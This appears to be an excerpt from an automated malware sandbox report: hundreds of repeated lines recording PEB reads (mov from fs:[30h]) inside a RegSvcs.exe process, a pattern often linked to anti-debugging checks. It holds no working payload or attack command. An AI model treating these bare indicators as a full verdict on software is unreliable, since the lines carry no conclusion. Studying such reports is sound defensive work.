            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]19_2_00FA2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]19_2_00FA2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F301F8 mov eax, dword ptr fs:[00000030h]19_2_00F301F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD61E5 mov eax, dword ptr fs:[00000030h]19_2_00FD61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E1D0 mov eax, dword ptr fs:[00000030h]19_2_00F7E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E1D0 mov eax, dword ptr fs:[00000030h]19_2_00F7E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E1D0 mov ecx, dword ptr fs:[00000030h]19_2_00F7E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E1D0 mov eax, dword ptr fs:[00000030h]19_2_00F7E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E1D0 mov eax, dword ptr fs:[00000030h]19_2_00F7E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC61C3 mov eax, dword ptr fs:[00000030h]19_2_00FC61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC61C3 mov eax, dword ptr fs:[00000030h]19_2_00FC61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8019F mov eax, dword ptr fs:[00000030h]19_2_00F8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8019F mov eax, dword ptr fs:[00000030h]19_2_00F8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8019F mov eax, dword ptr fs:[00000030h]19_2_00F8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8019F mov eax, dword ptr fs:[00000030h]19_2_00F8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F40185 mov eax, dword ptr fs:[00000030h]19_2_00F40185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBC188 mov eax, dword ptr fs:[00000030h]19_2_00FBC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBC188 mov eax, dword ptr fs:[00000030h]19_2_00FBC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFA197 mov eax, dword ptr fs:[00000030h]19_2_00EFA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFA197 mov eax, dword ptr fs:[00000030h]19_2_00EFA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFA197 mov eax, dword ptr fs:[00000030h]19_2_00EFA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA4180 mov eax, dword ptr fs:[00000030h]19_2_00FA4180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA4180 mov eax, dword ptr fs:[00000030h]19_2_00FA4180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4164 mov eax, dword ptr fs:[00000030h]19_2_00FD4164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4164 mov eax, dword ptr fs:[00000030h]19_2_00FD4164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F98158 mov eax, dword ptr fs:[00000030h]19_2_00F98158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06154 mov eax, dword ptr fs:[00000030h]19_2_00F06154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06154 mov eax, dword ptr fs:[00000030h]19_2_00F06154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFC156 mov eax, dword ptr fs:[00000030h]19_2_00EFC156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F94144 mov eax, dword ptr fs:[00000030h]19_2_00F94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F94144 mov eax, dword ptr fs:[00000030h]19_2_00F94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F94144 mov ecx, dword ptr fs:[00000030h]19_2_00F94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F94144 mov eax, dword ptr fs:[00000030h]19_2_00F94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F94144 mov eax, dword ptr fs:[00000030h]19_2_00F94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F30124 mov eax, dword ptr fs:[00000030h]19_2_00F30124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAA118 mov ecx, dword ptr fs:[00000030h]19_2_00FAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAA118 mov eax, dword ptr fs:[00000030h]19_2_00FAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAA118 mov eax, dword ptr fs:[00000030h]19_2_00FAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAA118 mov eax, dword ptr fs:[00000030h]19_2_00FAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC0115 mov eax, dword ptr fs:[00000030h]19_2_00FC0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov ecx, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov ecx, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov ecx, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov eax, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE10E mov ecx, dword ptr fs:[00000030h]19_2_00FAE10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F102E1 mov eax, dword ptr fs:[00000030h]19_2_00F102E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F102E1 mov eax, dword ptr fs:[00000030h]19_2_00F102E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F102E1 mov eax, dword ptr fs:[00000030h]19_2_00F102E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD62D6 mov eax, dword ptr fs:[00000030h]19_2_00FD62D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]19_2_00F0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]19_2_00F0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]19_2_00F0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]19_2_00F0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A2C3 mov eax, dword ptr fs:[00000030h]19_2_00F0A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F102A0 mov eax, dword ptr fs:[00000030h]19_2_00F102A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F102A0 mov eax, dword ptr fs:[00000030h]19_2_00F102A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]19_2_00F962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F962A0 mov ecx, dword ptr fs:[00000030h]19_2_00F962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]19_2_00F962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]19_2_00F962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]19_2_00F962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F962A0 mov eax, dword ptr fs:[00000030h]19_2_00F962A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E284 mov eax, dword ptr fs:[00000030h]19_2_00F3E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E284 mov eax, dword ptr fs:[00000030h]19_2_00F3E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F80283 mov eax, dword ptr fs:[00000030h]19_2_00F80283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F80283 mov eax, dword ptr fs:[00000030h]19_2_00F80283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F80283 mov eax, dword ptr fs:[00000030h]19_2_00F80283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF826B mov eax, dword ptr fs:[00000030h]19_2_00EF826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]19_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F04260 mov eax, dword ptr fs:[00000030h]19_2_00F04260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F04260 mov eax, dword ptr fs:[00000030h]19_2_00F04260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F04260 mov eax, dword ptr fs:[00000030h]19_2_00F04260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD625D mov eax, dword ptr fs:[00000030h]19_2_00FD625D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06259 mov eax, dword ptr fs:[00000030h]19_2_00F06259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBA250 mov eax, dword ptr fs:[00000030h]19_2_00FBA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBA250 mov eax, dword ptr fs:[00000030h]19_2_00FBA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F88243 mov eax, dword ptr fs:[00000030h]19_2_00F88243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F88243 mov ecx, dword ptr fs:[00000030h]19_2_00F88243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFA250 mov eax, dword ptr fs:[00000030h]19_2_00EFA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF823B mov eax, dword ptr fs:[00000030h]19_2_00EF823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1E3F0 mov eax, dword ptr fs:[00000030h]19_2_00F1E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1E3F0 mov eax, dword ptr fs:[00000030h]19_2_00F1E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1E3F0 mov eax, dword ptr fs:[00000030h]19_2_00F1E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F363FF mov eax, dword ptr fs:[00000030h]19_2_00F363FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]19_2_00F103E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]19_2_00F103E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]19_2_00F103E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]19_2_00F103E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]19_2_00F103E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]19_2_00F103E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]19_2_00F103E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]19_2_00F103E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE3DB mov eax, dword ptr fs:[00000030h]19_2_00FAE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE3DB mov eax, dword ptr fs:[00000030h]19_2_00FAE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE3DB mov ecx, dword ptr fs:[00000030h]19_2_00FAE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAE3DB mov eax, dword ptr fs:[00000030h]19_2_00FAE3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA43D4 mov eax, dword ptr fs:[00000030h]19_2_00FA43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA43D4 mov eax, dword ptr fs:[00000030h]19_2_00FA43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]19_2_00F0A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]19_2_00F0A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]19_2_00F0A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]19_2_00F0A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]19_2_00F0A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]19_2_00F0A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F083C0 mov eax, dword ptr fs:[00000030h]19_2_00F083C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F083C0 mov eax, dword ptr fs:[00000030h]19_2_00F083C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F083C0 mov eax, dword ptr fs:[00000030h]19_2_00F083C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F083C0 mov eax, dword ptr fs:[00000030h]19_2_00F083C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBC3CD mov eax, dword ptr fs:[00000030h]19_2_00FBC3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F863C0 mov eax, dword ptr fs:[00000030h]19_2_00F863C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFE388 mov eax, dword ptr fs:[00000030h]19_2_00EFE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFE388 mov eax, dword ptr fs:[00000030h]19_2_00EFE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFE388 mov eax, dword ptr fs:[00000030h]19_2_00EFE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF8397 mov eax, dword ptr fs:[00000030h]19_2_00EF8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF8397 mov eax, dword ptr fs:[00000030h]19_2_00EF8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF8397 mov eax, dword ptr fs:[00000030h]19_2_00EF8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2438F mov eax, dword ptr fs:[00000030h]19_2_00F2438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2438F mov eax, dword ptr fs:[00000030h]19_2_00F2438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA437C mov eax, dword ptr fs:[00000030h]19_2_00FA437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]19_2_00F8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]19_2_00F8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]19_2_00F8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8035C mov ecx, dword ptr fs:[00000030h]19_2_00F8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]19_2_00F8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]19_2_00F8035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA8350 mov ecx, dword ptr fs:[00000030h]19_2_00FA8350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCA352 mov eax, dword ptr fs:[00000030h]19_2_00FCA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]19_2_00F82349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD634F mov eax, dword ptr fs:[00000030h]19_2_00FD634F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD8324 mov eax, dword ptr fs:[00000030h]19_2_00FD8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD8324 mov ecx, dword ptr fs:[00000030h]19_2_00FD8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD8324 mov eax, dword ptr fs:[00000030h]19_2_00FD8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD8324 mov eax, dword ptr fs:[00000030h]19_2_00FD8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F20310 mov ecx, dword ptr fs:[00000030h]19_2_00F20310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A30B mov eax, dword ptr fs:[00000030h]19_2_00F3A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A30B mov eax, dword ptr fs:[00000030h]19_2_00F3A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3A30B mov eax, dword ptr fs:[00000030h]19_2_00F3A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFC310 mov ecx, dword ptr fs:[00000030h]19_2_00EFC310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F004E5 mov ecx, dword ptr fs:[00000030h]19_2_00F004E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F344B0 mov ecx, dword ptr fs:[00000030h]19_2_00F344B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8A4B0 mov eax, dword ptr fs:[00000030h]19_2_00F8A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F064AB mov eax, dword ptr fs:[00000030h]19_2_00F064AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBA49A mov eax, dword ptr fs:[00000030h]19_2_00FBA49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2A470 mov eax, dword ptr fs:[00000030h]19_2_00F2A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2A470 mov eax, dword ptr fs:[00000030h]19_2_00F2A470
